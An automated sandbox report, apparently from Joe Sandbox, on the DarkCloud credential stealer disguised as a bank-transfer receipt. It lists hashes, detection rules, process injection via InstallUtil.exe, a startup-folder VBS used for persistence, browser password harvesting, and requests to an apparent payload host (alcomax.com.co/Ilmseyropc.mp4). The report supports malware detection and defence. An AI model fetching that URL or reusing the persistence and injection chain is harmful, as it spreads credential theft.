Windows Analysis Report
Comprobante transferencia 5678373888272653688262553.exe

Overview

General Information

Sample name: Comprobante transferencia 5678373888272653688262553.exe
Analysis ID: 1618862
MD5: 365dbe320e1cad52761be88c423d63b3
SHA1: 836c6b3c078772af24cbdc32f99bd0ab851180af
SHA256: e51878878bc2c25af3ed62928903b952f576d687be143f7d2a5cf85f7f0aa6b6
Tags: exe, user-TeamDreier

Detection

DarkCloud
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected Generic Dropper
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Comprobante transferencia 5678373888272653688262553.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe" MD5: 365DBE320E1CAD52761BE88C423D63B3)
    • InstallUtil.exe (PID: 1268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WmiPrvSE.exe (PID: 6420 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • wscript.exe (PID: 6596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsClosed.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Roaming\IsClosed.exe" MD5: 365DBE320E1CAD52761BE88C423D63B3)
      • InstallUtil.exe (PID: 3552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DarkCloud Stealer | Stealer is written in Visual Basic. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x2d974:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
          SourceRuleDescriptionAuthorStrings
          0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              5.2.IsClosed.exe.3b86c88.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                5.2.IsClosed.exe.3b86c88.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  7.2.InstallUtil.exe.753dc8.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security

                    System Summary

                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , ProcessId: 6596, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , ProcessId: 6596, ProcessName: wscript.exe

                    Data Obfuscation

                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe, ProcessId: 4956, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs
                    No Suricata rule has matched

                    AV Detection

                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeReversingLabs: Detection: 35%
                    Source: Comprobante transferencia 5678373888272653688262553.exeVirustotal: Detection: 34%
                    Source: Comprobante transferencia 5678373888272653688262553.exeReversingLabs: Detection: 35%
                    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: alcomax.com.co
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2114998895.00000000060F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co/Ilmseyropc.mp4
                    Source: Comprobante transferencia 5678373888272653688262553.exe, IsClosed.exe.0.drString found in binary or memory: https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ==
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

                    System Summary

                    Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000000.2050627087.0000000000480000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAyksxp.dll" vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2115794595.00000000062F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAyksxp.dll" vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2089736087.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exeBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: InstallUtil.exe, 00000002.00000002.3307100438.000000000046D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/5@1/1
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: LoginData.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Comprobante transferencia 5678373888272653688262553.exeVirustotal: Detection: 34%
                    Source: Comprobante transferencia 5678373888272653688262553.exeReversingLabs: Detection: 35%
                    Source: Comprobante transferencia 5678373888272653688262553.exeString found in binary or memory: hlp-application/x-helpfile
                    Source: Comprobante transferencia 5678373888272653688262553.exeString found in binary or memory: aoskapplication/x-nokia-9000-communicator-add-on-software
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile read: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe "C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe"
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe"
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: schannel.dllJump to behavior
